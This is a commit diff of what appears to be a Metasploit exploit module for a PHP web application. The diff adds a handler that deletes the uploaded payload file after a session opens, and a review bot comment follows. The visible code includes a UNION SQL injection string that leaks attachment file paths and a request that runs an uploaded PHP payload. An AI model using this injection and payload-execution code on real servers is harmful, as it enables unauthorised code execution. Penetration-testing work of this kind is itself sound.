ranking changed plus on_new_session handler added
parent
468030786f
commit
d6b28dc44d
|
@ -8,7 +8,7 @@
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GreatRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
@ -131,6 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def on_new_session(client)
|
||||||
|
if client.type == "meterpreter"
|
||||||
|
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||||
|
client.fs.file.rm("#{@token}.php")
|
||||||
|
else
|
||||||
|
client.shell_command_token("rm #{@token}.php")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
base = target_uri.path
|
base = target_uri.path
|
||||||
|
@ -205,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'uri' => "#{base}upload_area/#{table}/#{id}/"
|
'uri' => "#{base}upload_area/#{table}/#{id}/"
|
||||||
})
|
})
|
||||||
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
||||||
token = $1
|
@token = $1
|
||||||
print_good("#{@peer} - Successfully retrieved file name (#{token})")
|
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
|
||||||
else
|
else
|
||||||
print_error("#{@peer} - Could not retrieve file name from directory index.")
|
print_error("#{@peer} - Could not retrieve file name from directory index.")
|
||||||
end
|
end
|
||||||
|
@ -217,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
# attempt to retrieve real file name from the database
|
# attempt to retrieve real file name from the database
|
||||||
if token.nil?
|
if @token.nil?
|
||||||
print_status("#{@peer} - Retrieving real file name from the database.")
|
print_status("#{@peer} - Retrieving real file name from the database.")
|
||||||
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
|
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
|
||||||
begin
|
begin
|
||||||
|
@ -227,8 +237,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'cookie' => datastore['COOKIE'],
|
'cookie' => datastore['COOKIE'],
|
||||||
})
|
})
|
||||||
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
||||||
token = $1
|
@token = $1
|
||||||
print_good("#{@peer} - Successfully retrieved file name (#{token})")
|
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
|
||||||
else
|
else
|
||||||
print_error("#{@peer} - Could not retrieve file name from the database.")
|
print_error("#{@peer} - Could not retrieve file name from the database.")
|
||||||
return
|
return
|
||||||
|
@ -240,11 +250,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
# retrieve and execute PHP payload
|
# retrieve and execute PHP payload
|
||||||
print_status("#{@peer} - Executing payload (#{token}.php)")
|
print_status("#{@peer} - Executing payload (#{@token}.php)")
|
||||||
begin
|
begin
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{token}.php"
|
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
|
||||||
})
|
})
|
||||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||||
print_error("#{@peer} - Connection failed")
|
print_error("#{@peer} - Connection failed")
|
||||||
|
|
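Review bot: The new `on_new_session` removes the uploaded file by the bare relative name `#{@token}.php`, which presumably works only when the session's working directory is the upload directory, and a failed removal is neither caught nor reported. A leftover, web-reachable PHP file on the tested host is a residual risk the operator should at least be told about. I would guard the handler with `return if @token.nil?` and close it with `rescue ::StandardError => e` followed by `print_warning("#{@peer} - Could not remove #{@token}.php, remove it manually: #{e}")`. The handler also does not call `super` and has no comment marking it as a cleanup step; a one-line `# remove the uploaded PHP file once a session is open` above the `def` would help. The surrounding `exploit` method starts and ends outside the visible hunks, so any remaining uses of the old local `token` could not be checked.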